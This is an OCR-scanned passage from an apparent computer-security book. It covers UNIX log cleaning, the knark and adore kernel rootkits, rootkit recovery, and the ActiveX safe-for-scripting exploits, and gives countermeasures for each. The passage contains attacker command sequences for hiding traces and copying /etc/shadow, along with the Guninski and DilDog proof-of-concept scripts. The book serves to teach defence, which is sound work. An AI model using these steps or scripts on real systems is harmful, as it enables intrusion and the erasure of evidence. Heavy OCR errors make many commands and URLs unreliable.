nel & Terminal is sold by Data Pellows, http:/ /www. datafellows.com/. OpenSSH is a 
free open-source alternative pioneered by the OpenBSD team and can be found at 
www.openssh.com. 
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The IP Security Protocol (IPSec) is a peer-reviewed proposed Internet standard that 
can authenticate and encr)^t IP traffic. Dozens of vendors offer IPSec-based prod- 
ucfs — consulf your favorife nefwork supplier for fheir currenf offerings. Linux users 
should consulf fhe FreeSWAN projecf af hffp: / / www.freeswan.org/ infro.hfml for a free 
open-source implemenfafion of IPSec and IKE. 




Log Cleaning 

Nof usually wanfing fo provide you (and especially fhe aufhorifies) wifh a record of fheir 
sysfem access, affackers will often clean up fhe sysfem logs — effectively removing fheir 
frail of chaos. A number of log cleaners are usually a parf of any good roofkif. Some of fhe 
more popular programs are zap, wzap, wted, and remove. Buf a simple fexf editor like 
vi or emacs will suffice in many cases. 

Of course, fhe tirsf sfep in removing fhe record of their activity is to alter the login logs. To 
discover the appropriate technique for fhis requires a peek info fhe / etc/ syslog . conf 
configuration file. For example, in fhe syslog . conf file shown nexf, we know fhaf fhe ma- 
jorify of fhe sysfem logins can be foimd in fhe /var/log/ directory: 



[quake]# cat /etc/syslog . conf 

# Log all kernel messages to the console. 

# Logging much else clutters up the screen. 

#kern.’^ /dev/console 

# Log anything (except mail) of level info or higher. 

# Don't log private authentication messages! 

* . inf o; mail . none ; authpriv . none /var/ log/messages 

# The authpriv file has restricted access. 

authpriv.* /var/log/secure 

# Log all the mail messages in one place. 

mail.* /var/log/maillog 

# Everybody gets emergency messages, plus log them on another 

# machine. 

*.emerg * 

# Save mail and news errors of level err and higher in a 

# special file. 

UUCP, news . crit /var/log/spooler 



Wifh fhis knowledge, fhe affackers know fo look in fhe / var/log directory for key log 
files. Wifh a simple lisfing of fhaf directory, we find all kinds of log files, including cron, 
maillog, messages, spooler, secure (TCP Wrappers log), wtmp, and xferlog. 

A number of files will need fo be altered, including messages, secure, wtmp, and 
xferlog. Since fhe wtmp log is in binary formaf (and fypically used only for fhe who 
command), fhe affackers will often use a roofkif program fo alter fhis file. Wz ap is specific 
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to the wtmp log and will clear out the specified user from fhe wtmp log only. For example, 
fo run wzap, perform fhe following: 

[quake]# who ./wtmp 



joel 


ftpdl7264 


! Jul 


. 1 


. 12:09 


(172.16.11.204 


root 


ttyl 


Jul 


4 


22:21 




root 


ttyl 


Jul 


9 


19:45 




root 


ttyl 


Jul 


9 


19:57 




root 


ttyl 


Jul 


9 


21:48 




root 


ttyl 


Jul 


9 


21:53 




root 


ttyl 


Jul 


9 


22 : 45 




root 


ttyl 


Jul 


10 


12:24 




joel 


ttyl 


Jul 


11 


09:22 




stuman 


ttyl 


Jul 


11 


09:42 




root 


ttyl 


Jul 


11 


09:42 




root 


ttyl 


Jul 


11 


09:51 




root 


ttyl 


Jul 


11 


15:43 




joel 


ftpd841 


Jul 


11 


22 : 51 


(172.16.11.205) 


root 


ttyl 


Jul 


14 


10:05 




joel 


ftpd3137 


Jul 


15 


08:27 


(172.16.11.205) 


joel 


ftpd82 


Jul 


15 


17 : 37 


(172.16.11.205) 


joel 


ftpd945 


Jul 


17 


19:14 


(172.16.11.205) 


root 


ttyl 


Jul 


24 


22:14 




[quake] # 


/opt /wzap 








Enter username to 


zap 


from the 


wtmp: joel 


opening 


f ile . . . 










opening 


output f ile . . . 








working . 












[quake] # 


who . / wtmp . out 






root 


ttyl 


Jul 


4 


22:21 




root 


ttyl 


Jul 


9 


19:45 




root 


ttyl 


Jul 


9 


19:57 




root 


ttyl 


Jul 


9 


21:48 




root 


ttyl 


Jul 


9 


21:53 




root 


ttyl 


Jul 


9 


22 : 45 




root 


ttyl 


Jul 


10 


12:24 




stuman 


ttyl 


Jul 


11 


09:42 




root 


ttyl 


Jul 


11 


09:42 




root 


ttyl 


Jul 


11 


09:51 




root 


ttyl 


Jul 


11 


15:43 




root 


ttyl 


Jul 


14 


10:05 




root 


ttyl 


Jul 


24 


22:14 




root 


ttyl 


Jul 


24 


22:14 
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The new outputted log (wtmp . out) has the user "joel" removed. By issuing a simple 
copy command to copy wtmp . out to wtmp, the attackers have removed the log entry for 
their login. Some programs like z ap (for SunOS 4.x) acfually alfer fhe lasf login dale / time 
(as when you finger a user). Nexf, a manual edif (using vi or emacs) of fhe secure, 
messages, and xf erlog log files will further remove their activity record. 

One of fhe lasf sfeps will be fo remove fheir own commands. Many UNIX shells keep 
a hisfory of fhe commands run fo provide easy retrieval and repetition. For example, the 
Bourne again shell (/bin/bash) keeps a file in fhe user's directory (including roof's in 
many cases) called . bash_hi story fhaf mainfains a lisf of fhe recently used commands. 
Usually as the last step before signing off, affackers will wanf fo remove fheir entries. For 
example, the . bash_history may look something like this: 

tail -f /var/log/messages 
vi chat-pppO 
kill -9 1521 
logout 

< the attacker logs in and begins his work here > 

id 

pwd 

cat /etc/shadow >> /tmp/ .badstuf f /sh . log 
cat /etc/hosts >> /tmp/ .badstuf f /ho . log 
cat /etc/groups >> /tmp/ . badstuf f/gr . log 
netstat -na >> /tmp/ . badstuf f /ns . log 
arp -a >> /tmp/ .badstuf f /a . log 
/sbin/if conf ig >> /tmp/ .badstuf f /if . log 

find / -name -type f -perm -4000 >> /tmp/ . badstuf f/suid . log 
find / -name -type f -perm -2000 >> /tmp/ . badstuf f/sgid . log 



Using a simple text editor, the attackers will remove these entries and use the touch 
command to reset the last accessed date and time on the file. Usually affackers will nof 
generafe hisfory files because fhey disable fhe hisfory feafure of fhe shell by selling 

unset HISTFILE; unset SAVEHIST 

Additionally, an infruder may link . bash_history to / dev/ null: 

[rumble]# In -s /dev/null .bash_history 
[rumble]# Is -1 .bash_history 

Irwxrwxrwx 1 root root 9 Jul 26 22:59 . bash_history -> /dev/null 

O I-09 Cleaning Countermeasure 

It is important to write log file information to a medium that is difficult to modify. Such a 
medium includes a file system thaf supporfs extend attributes such as the append-only 
flag. Thus, log information can only be appended to each log file, rather than altered by 
attackers. This is not a panacea, as it is possible for affackers fo circumvenf this mecha- 
nism. The second method is to syslog critical log information to a secure log host. 
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"Secure syslog" from Core Labs (http:/ / www.core-sdi.com/english/freesoft.html) im- 
plements cryptography with remote syslog capabilities to help protect your critical log 
files. Keep in mind that if your system is compromised, it is very difficult to rely on the 
log files that exist on the compromised system due to the ease with which attackers can 
manipulate them. 

Kernel Rootkits 

We have spent some time exploring traditional rootkits that modify and that Trojan exist- 
ing files once the system has been compromised. This type of subterfuge is passe. The lat- 
est and most insidious variants of rootkits are now kernel based. These kernel-based 
rootkits actually modify the rurming UNIX kernel to fool all system programs without 
modifying the programs themselves. 

Typically, a loadable kernel module (LKM) is used to load additional functionality 
into a rurming kernel without compiling this feature directly into the kernel. This func- 
tionality enables loading and unloading kernel modules when needed, while decreasing 
the size of the rurming kernel. Thus, a small, compact kernel can be compiled and mod- 
ules loaded when they are needed. Many UNIX flavors support this feature, including 
Linux, FreeBSD, and Solaris. This functionality can be abused with impunity by an at- 
tacker to completely manipulate the system and all processes. Instead of using LKM to 
load device drivers for items such as network cards, LKMs will instead be used to inter- 
cept system calls and modify them in order to change how the system reacts to certain 
commands. The two most popular kernel rootkits are knark for Linux and Solaris Load- 
able Kernel Modules (http://www.infowar.co.Uk/thc/files/thc/slkm-l.0.tar.gz) by 
THC. We will discuss knark (http://packetstorm.securify.com/UNIX/penetra- 
tion/rootkits/knark-0.59.tar.gz) in detail; however, additional information on Solaris 
kernel back doors can be found at (http://www.infowar.co.uk/thc/files/thc/ 
slkm-l.O.html/). 

Knark was developed by Creed and is a kernel-based rootkit for the Linux 2.2.x series 
kernels. The heart of the package is kernel module knark . o. To load the module, attack- 
ers use the kernel module loading utility insmod. 

[shadow]# /sbin/insmod knark. o 

Next, we see if the module is loaded. 

[shadow]# /sbin/lsmod 



Module 


Size 


Used 


by 


knark 


6936 


0 


(unused) 


nls_iso8859-l 


2240 


1 


(autoclean) 


lockd 


30344 


1 


(autoclean) 


sunrpc 


52132 


1 


(autoclean) 


rtl8139 


11748 


1 


(autoclean) 



[ lockd] 
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We can see that the knark kernel module is loaded. As you would imagine, it would be 
easy for an admin to detect this module, which would defeat the attackers' desire to re- 
main undetected with privileged access. Thus, attackers can use the modhide . o LKM 
(part of fhe knark package) fo remove fhe knark module from fhe Ismod oufpuf. 

[shadow]# /sbin/insmod modhide. o 



modhide. o: init_module 
[shadow]# /sbin/lsmod 


; Device 


or 


resource busy 


Module 


Size 


Used 


by 


nls_iso8859-l 


2240 


1 


(autoclean) 


lockd 


30344 


1 


(autoclean) 


sunrpc 


52132 


1 


(autoclean) [( 


rtl8139 


11748 


1 


(autoclean) 



As you can see when we run Ismod again, knark has magically disappeared. 

Ofher inferesting utilities included wifh knark are 

T hidef Used fo hide files on fhe sysfem. 

■ unhidef Used fo unhide hidden files. 

■ ered Used fo configure exec-redirecfion. This allows fhe attackers' Trojan 
programs fo be execufed insfead of fhe original versions. 

■ nethide Used fo hide sfrings in /proc/nef/fcp and /proc/nef/udp. This 
is where nefsfaf gefs ifs informafion and is used fo hide connecfions by fhe 
attackers fo and from fhe compromised sysfem. 

■ taskhack Used fo change *UlDs and *GIDs of running processes. Thus, 
attackers can insfanfly change fhe process owner of/bin/sh (run as a 
normal user) fo a user ID of roof (0). 

■ rexec Used fo execufe commands remofely on a knark server. If supporfs 
fhe abilify fo spoof fhe source address; fhus, commands can be execufed 
wifhouf defection. 

A rootme Used fo gain roof access wifhouf using SUID programs. See nexf 
how easy fhis is: 

[shadow] $ rootme /bin/sh 

rootme . c by Creed 0 ihack.se 1999 creed0sekure.net 

Do you feel lucky today, haxOr? 

bash# 

In addition fo knark, Teso has creafed an updafed kernel roofkif varianf called adore, 
which can be found af http:/ / feso.scene.af/ releases/ adore-0.14.far.gz. This program is 
equally if nof more powerful fhan knark. Some of fhe options are listed next. 

[shadow] $ ava 

Usage: ./ava { h, u, r , i , v, U } [file, PID or dummy (for 'U')l 
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h hide file 
u unhide file 
r execute as root 
U uninstall adore 
i make PID invisible 
V make PID visible 

If that isn't enough to scare you, Silvio Cesare has written a paper on associated tools 
that allow you to patch kernel memory on the fly to back-door systems that don't have 
LKM support. This paper and associated tools can be found at http:/ / www.big.net.au/ 
-silvio/ run time-kemel-kmem-patching.txt. Finally, Job De Haas has done some tremen- 
dous work in researching kernel hacking on Solaris. You can take a look at some beta code 
he wrote at http:/ /www.itsx.com/kemmod-0.2.tar.gz. 

Q Kernel Rootkit Countermeasures 

As you can see, kernel rootkits can be devastating and almost impossible to find. You can- 
not trust the binaries or the kernel itself when trying to determine if a system has been 
compromised. Even checksum utilities like Tripwire will be rendered useless when the 
kernel has been compromised. One possible way of detecting knark is to use knark 
against itself. Since knark allows an intruder to hide any process by issuing akill-31to 
a specific PID, you can unhide each process by sending it kill-32. A simple shell script 
that sends akill -32 to each process ID will work. 

# ! /bin/sh 
rm pid 
S = 1 

while [ $S -It 10000 ] 
do 

if kill -32 $S; then 
echo "$S" >> pid 
fi 

S=' expr $S + 1 ' 



Done 

Keep in mind that the kill - 3 1 and kill - 3 2 are configurable options when knark 
is built. Thus, a more skilled attacker may change these options to avoid detection. How- 
ever, most unsophisticated attackers will happily use the default settings. 

Prevention is always the best countermeasure we can recommend. Using a program 
such as LIDS (Linux Intrusion Detection System) is a great preventative measure that you 
can enable for your Linux systems. LIDS is available from www.lids.org and provides the 
following capabilities and more: 

T The ability to "seal" the kernel from modification 

■ The ability to prevent the loading and imloading of kernel modules 
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■ Immutable and append-only file attributes 

■ Locking of shared memory segments 

■ Process ID manipulation protection 

■ Protect sensitive /dev/ files 
A Port scan detection 

LIDS is a kernel patch that must be applied to your existing kernel source, and the kernel 
must be rebuilt. After LIDS is installed, use the lidsadm tool to "seal" the kernel to pre- 
vent much of the aforementioned LKM shenanigans. Let's see what happens when LIDS 
is enabled and we try to run knark: 

[shadow]# insmod knark. o 

Command terminated on signal 1. 

A look at /var/ log/ messages indicates that LIDS not only detected the attempt to 
load the module, but also proactively prevented it. 

Jul 9 13:32:02 shadow kernel: LIDS: insmod (3 1 inode 58956) pid 700 user (0/0) 
on ptsO: CAP_SYS_MODULE violation: try to create module knark 

For systems other than Linux, you may want to investigate disabling LKM support on 
systems that demand the highest level of security. This is not the most elegant solution, 
but it may prevent a script kiddie from ruining your day. 

Rootkit Recovery 

While we cannot provide extensive incident response or computer forensic procedures 
here, it is important to arm yourself with various resources that you can draw upon 
should that fateful phone call come. What phone call you ask? It will go something like 
this. "Hi, I am the admin for so-and-so. I have reason to believe that your system(s) have 
been attacking ours." "How can this be, all looks normal here," you respond. Your caller 
says check it out and get back to him. So now you have that special feeling in your stom- 
ach that only an admin who has been hacked can appreciate. You need to determine how 
and what happened. Remain calm and realize that any action you take on the system may 
affect the electronic evidence of an intrusion. Just by viewing a file, you will affect the last 
access timestamp. A good first step in preserving evidence is to create a toolkit with stati- 
cally linked binary files that have been cryptographically verified to vendor-supplied bi- 
naries. The use of statically linked binary files is necessary in case attackers modify 
shared library files on the compromised system. This should be done before an incident 
occurs. You maintain a floppy or CD-ROM of common statically linked programs that at 
a minimum include 

Is su 



ps 



login 



dd 

du 
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netstat 


grep 


Isof 


w 


df 


top 


finger 


sh 


file 



With this toolkit in hand, it is important to preserve the three timestamps associated 
with each file on a UNIX system. The three timestamps include the last access time, time 
of modificafion, and fime of creafion. A simple way of saving fhis informafion is fo run 
fhe following commands and save fhe oufpuf fo a floppy or exfernal media: 

Is -alRu > /floppy/timestamp_access -txt 
Is -alRc > /floppy/timestamp_modif ication . txt 
Is -alR > /f loppy/timestamp_creation . txt 

Af a minimum, you can begin fo review fhe oufpuf offline wifhouf furfher disfurbing 
fhe suspecf sysfem. In mosf cases, you will be dealing wifh a canned roofkif insfalled wifh 
a defaulf configurafion. Depending on when fhe roofkif is insfalled, you should be able fo 
see many of fhe roofkif files, sniffer logs, and so on. This assumes fhaf you are dealing 
wifh a roofkif fhaf has nof modified fhe kernel. Any modificafions fo fhe kernel and all 
befs are off on geffing valid resulfs from fhe aforemenfioned commands. Consider using 
a secure hoof media such as Trinux (hffp: / / www.frinux.org) when performing your fo- 
rensic work on Linux sysfems. This should give you enough informafion fo sfarf fo defer- 
mine if you have been roofkif fed. Affer you have fhis informafion in hand, you should 
consul! fhe following resources fo fully defermine whaf has been changed and how fhe 
compromise happened. If is imporfanf fo fake copious nofes on exacfly whaf commands 
you run and fhe relafed oufpuf. 

T hffp:/ /sfaff.washington.edu/diffrich/misc/faqs/roofkifs.faq 

■ hffp:/ /sfaff. washingfon.edu/diffrich/misc/faqs/responding.faq 

■ hffp: / / www.sfanford.edu / ~dbrumley/Me / roofkifs-desc.fxf 

A hffp: / / www.fish.com / forensics / freezing.pdf and fhe corresponding Forensic 
foolkif (hffp:/ /www.fish.com/securify/fcf.hfml) 

You should also ensure fhaf you have a good incidenf response plan in place before an 
acfual incidenf (hffp:/ /www.sei.cmu.edu/pub/documenfs/98.reporfs/pdf /98hb001.pdf). 
Don'! be one of fhe many people who go from defecfrng a securify breach fo calling fhe au- 
fhorifies. There are many ofher sfeps in between. 



SUMMARY 

As we have seen fhroughouf our journey, UNIX is a complex sysfem fhaf requires much 
fhoughf fo implemenf adequafe securify measures. The sheer power and elegance fhaf 
make UNIX so popular are also ifs greafesf securify weakness. A myriad of remofe and 
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local exploitation techniques may allow attackers to subvert the security of even the most 
hardened UNIX systems. Buffer overflow condifions are discovered daily. Insecure cod- 
ing practices abound, while adequafe fools fo monifor such nefarious acfivifies are ouf- 
dafed in a maffer of weeks. If is a consfanf baffle fo sfay ahead of fhe lafesf "0 day" 
exploifs, buf if is a baffle fhaf musf be foughf. Table 8-3 provides addifional resources fo 
assisf you in achieving securify nirvana. 



Name 


Operating 

System 


Location 


Description 


Titan 


Solaris 


http: / /www.fish.com/ titan/ 


A collection of programs 
to help "titan" (that's 
"tighten") Solaris. 


"Solaris Security FAQ" 


Solaris 


http: / /www.sunworld.com/ 

sunworldonline/common/ 

security-faq.html 


A guide to help lock 
down Solaris. 


"Armoring Solaris" 


Solaris 


http: / /www.enteract.com/ 
-Ispitz / armoring.html 


How to armor the Solaris 
operating system. This 
article presents a systematic 
method to prepare for a 
firewall installation. Also 
included is a downloadable 
shell script that wiU armor 
your system. 


"NIS+ part 1: What's 
in a Name (Service)?" 
by Peter Galvin 


Solaris 


http: / /www.sunworld.com/ 
sunworldonline/swol-09-1996 / 
swol-09-security.html 


A great discussion on 
NIS+ security features. 


"FreeBSD Security 
How-To" 


FreeBSD 


http: / /www.freebsd.org/ 
~jkb/howto.html 


While this How-To is 
FreeBSD specific, most of 
the material covered here 
will also apply to other 
UNIX OSes (especially 
OpenBSD and NetBSD). 


"Linux 

Administrator's 
Security Guide 
(LASG)" by Kurt 
Seifried 


Linux 


https : / / WWW . seifried.org / lasg/ 


One of the best papers 
on securing a Linux 
system. 


"HP-UX Security" 


HP-UX 


http: / /wwwinfo.cern.ch/ dis / 
security /hpsec.html 


Information on HP-UX 
security. 


"Watching Your Logs" 
by Lance Spitzner 


General 


http: / /www.enteract.com/ 
-Ispitz / swatch.html 


How to plan and 
implement an automated 
filter for your logs 
utilizing swatch. 

Includes examples on 
configuration and 
implementation. 
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Name 


Operating 

System 


Location 


Description 


"UNIX Computer 


General 


ftp: / /ftp.auscert.org.au/pub/ 


A handy UNIX security 


Security Checklist 




auscert/papers/ unrx_security_ 


checklist. 


(Version 1.1)" 




checklist 




"The Unix Secure 


General 


http://www.sunworld.com/ 


Tips on security design 


Programming FAQ" 




sunworldonline/ swol-08-1998/ 


principles, programming 


by Peter Galvin 




swol-08-security.html 


methods, and testing. 


"CERT Intruder 


General 


ftp: / /info.cert.org/pub / 


A guide to looking for 


Detection Checklist" 




tech_tips / intruder_detection_ 


signs that your system 






checklist 


may have been 
compromised. 
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W e've spent a lot of time in this book talking about common techniques for break- 
ing into systems that are owned by companies and run by experienced adminis- 
trators. After all, that's where all the valuables are, right? What could malicious 
hackers possibly hope to attain from breaking into the average home computer? 

The reality is, the home computer is only part of the picture. Everyone uses the prod- 
ucts preyed upon in this chapter: web browsers, email readers, and all marmer of Internet 
client software. Everyone is thus a potential victim, and the information on their system is 
likely just as critical as the stuff sitting on a web server, if not more so. The sheer distrib- 
uted nature of the problem also makes it much harder to address than its counterpart on 
the server side. 

The tools and techniques highlighted in this chapter affect not just individuals, but 
can also have a devastating impact on the organizations they work for. If you consider 
fhat everyone from CEO to shipping clerk uses this software for nearly 90 percent of their 
daily activities (namely, email reading and web browsing), it might dawn on you that this 
is indeed a serious issue for corporate users, as well as for the average consumer Internet 
surfer. Also consider the potential public relations embarrassment and potential down- 
stream liability for a company that perpetuated the spread of malicious code like worms 
by not taking the appropriate security measures. Worried yet? 

Hacking the Internet user is snowballing in popularity among the underground if the 
hail of Internet client software security advisories released in 2001 is any indication. Client- 
side hacking requires only a slightly different mindset from that which seeks to compro- 
mise major Internet servers such as www.amazon.com. The difference is one of degree of 
effort and scale. Instead of focusing intense intellectual effort against one unique target or 
specific web server application, user hacking seeks to find a common denominator 
among the widest range of potential victims. T 5 q?ically, this common denominator is a 
combination of frequent Internet usage, Microsoft's overwhelmingly popular and widely 
used software products, and lack of security savvy among the biological organisms oper- 
ating that software. 

We've already covered some of the many ways that these omnipresent factors can be 
exploited. Chapter 4 discussed attacks against Microsoft's consumer operating systems 
most used by Internet denizens (Win 9x/ME/XP HE). Chapters 4 and 14 covered Trojans 
and back doors often planted on unsuspecting user's systems, as well as the technique of 
"social engineering" that is so effective in getting a computer's human operator to per- 
form the malicious hacker's bidding by nontechnical means. This chapter will build on 
some of this work. It will introduce entirely different and more insidious paths by which 
back doors can be planted, as well as a more technical route for launching some of the 
most subliminal social attacks (that is, the subject line of an email message). 

Before we begin, we must warn those of faint heart that what we are about to show 
you is incredibly volatile if used unwisely. Unquestionably, we will be criticized for ex- 
plaining in detail how all these attacks are actually implemented. To which we will an- 
swer, as we have throughout this book: only in understanding the ways of the enemy in 
intimate detail will we protect potential victims. Our own journey of discovery through 
the material presented here was quite a jarring eye-opener. Read on to learn how to pro- 
tect your personal slice of the Internet. 
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MALICIOUS MOBILE CODE 

Mobile code was important in the genesis of the Internet from a sfafic, documenf-based 
medium fo fhe dynamic, sponfaneously generafed communify fhaf if is foday. Some evo- 
lufion of currenf mobile code fechnologies may yef prove fo be fhe dominanf model for 
compufing of fhe fufure. However, currenf frends have moved away from reliance on 
such clienf-side execution models and foward dynamic HTML (DHTML), sfyle sheefs, 
and server-side scripfing funcfionalify. (Some may argue fhaf fhe execufion is sfill occur- 
ring on fhe clienf side, if's jusf migrafing deeper info fhe web browser.) In any case, mo- 
bile code, which fraverses a network during ifs lifetime and execufes af a destination 
machine, remains a critical parf of fhe fabric of fhe Nef foday (see hffp:/ / www.compufer 
.org/infemef/v2n6/w6gei.hfm). The fwo dominanf paradigms for mobile code, Sim's 
Java and Microsoff's ActiveX, will sfill be found executing in browsers ever 5 rwhere and 
fhus are critically imporfanf fo any discussion of Infernef clienf securify. 




See Chapter 6 for a discussion of Microsoft’s .NET Frameworks, a new mobiie code paradigm around 
which the company is buiiding its next-generation software products. 



Inevitably, comparisons are drawn between ActiveX and Java. We won't get into the 
debate here, but rather will talk neutrally about actual vulnerabilities discovered in each 
system. For a strong technical discussion of the pluses and minuses of the two mobile 
code models from a security perspective, see "A Comparison Between Java and ActiveX 
Security" by David Hopwood at http://www.users.zetnet.co.uk/hopwood/papers/ 
compsec97.html. 



Microsoft ActiveX 

Microsoft dubbed its first attempt at a mobile code model ActiveX. ActiveX is often de- 
scribed simply as Object Linking and Embedding (OLE) compound-document technology 
revamped for the Web. This is a vast oversimplification of the set of APIs, specifications, 
and ambitious development paradigms, such as COM, that actually undergird the technol- 
ogy, but it is the easiest way to grasp it. ActiveX applications, or controls, can be written to 
perform specific functions (such as displaying a movie or sound file). They can be embed- 
ded in a web page to provide this functionality, just like OLE supports embedding of Excel 
spreadsheets within Word documents. 

ActiveX controls typically have the file extension .ocx. (ActiveX controls written in Java 
are an exception.) They are embedded within web pages using the <OBJECT> tag, which 
specifies where the control is downloaded from. When Internet Explorer encounters a web 
page with an embedded ActiveX control (or multiple controls), it first checks the user's lo- 
cal system Registry to find out if that component is available on his or her machine. If it is, 
IE displays the web page, loads the control into the browser's memory address space, and 
executes its code. If the control is not already installed on the user's computer, IE down- 
loads and installs the control using the location specified within the <OBJECT> tag. Op- 
tionally, it verifies the author of the code using Authenticode (see upcoming), and then 
executes it. By default, controls are downloaded into an ActiveX control cache located in 
the \windows\occache directory. 
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Acting solely within the model described so far, malicious programmers could write 
ActiveX controls to do just about anything they wanted to a user's machine. What stands 
in the way? Microsoft's Authenticode paradigm. Authenticode allows developers to 
"sign" their code using cryptographic mechanisms that can be authenticated by IE and a 
third party before fhey are execufed. (Verisign Corporafion is f 5 ^ically fhe fhird parfy.) 

How does Aufhenficode work in fhe real world? In 1996, a programmer named Fred 
McLain wrofe an ActiveX confrol fhaf shuf down fhe user's sysfem cleanly (if if was rim- 
ning Windows 95 wifh advanced power managemenf). He obfained a genuine Verisign 
signafure for fhis confrol, which he called Infemef Exploder, and hosfed if on his web sife. 
Affer brief debafe abouf fhe merifs of fhis public display of Aufhenficode's securify model 
in action, Microsoft and Verisign revoked McLain's software publisher certificate, claiming 
he had violated the pledge on which it was based. Exploder still rims, but now informs 
surfers fhaf if has nof been regisfered and gives fhem fhe option fo cancel fhe download. 

We'll leave if fo fhe reader fo decide whefher fhe Aufhenficode sysfem worked or nof 
in fhis insfance; buf keep in mind fhaf McLain could have done far worse fhings fhan shuf 
down a compufer, and he could have done fhem a lof more sfealfhily, too. Today, AcfiveX 
confinues fo provide essential fimcfionalify for many web sifes wifh liffle fanfare. There 
have been addifional problems, however, fhe mosf serious of which we will discuss nexf . 

/ 

"[he ActiveX “Safe for Scripting” Issue 



Popularity: 


9 


Simplicity: 


5 


Impact: 


10 


Risk Rating: 


8 



In summer 1999, Georgi Guninski and Richard M. Smifh, ef al., separafely revealed 
two differenf examples of fhe safe-for-scripting vulnerabilify in IE's handling of AcfiveX. 
By seffing fhis safe-for-scripfing flag in fheir confrols, developers could bypass fhe nor- 
mal Aufhenficode signafure checking entirely. Two examples of such confrols fhaf 
shipped with IE 4 and earlier, Scriptlet.typelib and Eyedog.OGX, were so flagged, and 
fhus gave no warning fo fhe user when execufed by IE. 

AcfiveX confrols fhaf perform harmless functions probably wouldn'f be all fhaf wor- 
risome; however, Scripflef and Eyedog bofh have fhe abilify fo access fhe user's file sys- 
fem. Scripflef.f5^1ib can creafe, edif, and overwrite files on fhe local disk. Eyedog has fhe 
abilify fo query fhe Regisfry and gafher machine characferisfics. 

Georgi Guninski released proof-of-concepf code for fhe Scripflef confrol fhaf wrifes an 
execufable fexf file wifh fhe extension .hfa (HTML application) fo fhe Sfarfup folder of a re- 
mote machine. This file will be execufed fhe nexf time fhaf machine reboofs, displa 5 ting a 
harmless message from Georgi, buf neverfheless making a very solemn poinf: by simply vis- 
iting Georgi's concepf page af hffp: / / www.guninski.com / scrflb.hfml, you enable him fo ex- 
ecute arbifrary code on your sysfem. Game over. His proof-of-concepf code is shown nexf. 

<object id="scr" 

classid="clsid:06290BD5-48AA-llD2-8432-006008C3FBFC" 
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</ob ject> 

<SCRIPT> 
scr .Reset () ; 

scr .Path="C: WwindowsWStart MenuWProgramsWStartUpWguninski.hta"; 
scr ,Doc="<ob ject id=' wsh' classid='clsid:F935DC22-lCF0-llD0-ADB9- 
00C04FD58A0B ' ></ob ject><SCRIPT>alert ( 'Written by Georgi Guninski 
http : //www. guninski . com/~ joro ' ) ; wsh. Run ( ’ c : Wcoitimand. com’ ) ; </"+"SCRIPT>" ; 
scr .write () ; 

</SCRIPT> 

</ob ject> 

This exposure of software interfaces to programmatic access was termed "accidental 
Trojans" by Richard M. Smith. ActiveX controls like Eyedog and Scriptlet sit harmlessly 
on the hard disks of millions of users, preinstalled with popular software like IE, waiting 
for someone to access them remotely (see http:/ / www.cnn.com/TECH/computing/ 
9909 / 06 / activex.idg / ) . 

The extent of this exposure is alarming. Registered ActiveX controls can be marked as 
"safe for scripting" either by implementing lObjectSafety within the control or by marking 
them as safe in the Registry by adding the key 7DD95801-9882-11CE-9EA9-00AA006C42C4 
to the Implemented Categories for the control (see http:/ / msdn.microsoft.com/workshop/ 
components /activex/ safety.asp). Searching through a t 5 ^ical Windows system Registry 
yields dozens of such controls. Any controls that also have the ability to perform privileged 
actions (such as writing to disk or executing code) could also be used in a similar attack. 

There are a few ways to get an idea of how many of these applications your system ac- 
tively uses. To simply view active COM applications (including ActiveX controls) in- 
stalled on your system, go to the Start button, select Run, and type dcomcnfg. The result 
is shown in the following illustration: 
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To see if any of fhese have been marked safe for scripting in fhe Regisfry, employ 
oleview from fhe NT Resource Kif. (A newer version is included wifh Microsoff's Visual 
Sfudio developmenf environmenf.) Oleview browses all of fhe regisfered COM/ AcfiveX 
objecfs on fhe sysfem. If will also display fhe Class ID (CLSID) by which if is called in fhe 
Regisfry, and many ofher imporfanf paramefers as well, including Implemenfed Cafego- 
ries. Oleview is shown nexf: 




Oleview will also display fhe inferfaces exporfed by an objecf, indicafing whefher fhe 
objecf is also a good fargef for hijacking fo perform privileged actions. 

Sure enough, anofher such confrol was discovered nearly a year lafer by DilDog of 
Culf of fhe Dead Cow (of Back Orifice fame — see Chapfer 4). The so-called Office 2000 UA 
(OUA) confrol is regisfered wifh a sysfem when Microsoff's Office suife of producfivify 
fools is insfaUed. DilDog's proof-of-concepf web page, http: / / www.afsfake.com/research/ 
advisories/ 2000 /ouahack/index.hf ml, insfanfiafes OUA remofely on fhe user's sysfem 
and fhen uses if fo disable macro profecfion for Office documenfs without warning the user. 
DilDog's page fhen downloads a file called "evil.doc," which confains a simple macro 
fhaf creafes fhe file C:\dildog-was-here.fxf. The remofe msfanfiafion of OUA is done using 
fhe following code embedded in DilDog's proof-of-concepf web page: 

var ua; 

function setup ( ) 

{ 

// Create UA control 

ua = new ActiveXOb ject ( "OUACtrl . OUACtrl . 1 " ) ; 

// Attach ua object to ppt object 
ua .WndClass="OpusApp" ; 
ua . Of f iceApp=0 ; 
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// Verify UA objects sees Office application 
return ua . IsAppRunning ( ) ; 



function disablemacroprotection ( ) 

{ 

var ret; 

// Activate application 
ua . AppActivate ( ) ; 

// Display macro security dialog 
ua . ShowDialog (0x0E2B) ; 

// Click the 'low' button 
ua . SelectTabSDM ( 0x13 ) ; 

// Click the 'ok' button 
ua . SelectTabSDM ( 1 ) ; 

} 



function enablemacroprotection ( ) 

{ 

// Activate application 
ua . AppActivate ( ) ; 

// Display macro security dialog 
ua . ShowDialog (0x0E2B) ; 

// Click the 'medium' button 
ua . SelectTabSDM ( 0x12 ) ; 

// Click the 'ok' button 
ua . SelectTabSDM ( 1 ) ; 

} 

// Beginning of script execution 
if (setup ( ) ) { 

disablemacroprotection ( ) ; 

parent . frames [ "blank" ] . location=" 

} 

</ script> 

</body> 

</html> 
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Safe-for-scripting controis can aiso be caiied from HTML-formatted emaii and can be more efficientiy 
targeted (and thus are more dangerous) when deiivered in this manner. We’ii discuss such expioits in 
the upcoming section “Emaii Hacking.’’ 



O Avoiding the “Safe for Scripting” Issue 

There are three ways to address this serious issue from the Internet user perspective. We 
recommend using all three. 

The first is to apply the relevant patches for both Scriptlet/Eyedog and OUA. They 
are available at http:/ /www. microsoft.com/technet/security/bulletin/ms99-032. asp 
and http:/ /office.microsoft.com/downloads/2000/Uactlsec.aspx, respectively. Readers 
should recognize, however, that these are point fixes: fhey change fhe safe-for-scripfing 
flag only in these specific controls. They do not provide global protection against any new 
attacks based on other controls that also happened to be marked "safe." Recall our discus- 
sion of "accidental Trojans" that haven't been discovered yet! 

The second countermeasure is specifically aimed af fhe OUA exploif and ofhers like if 
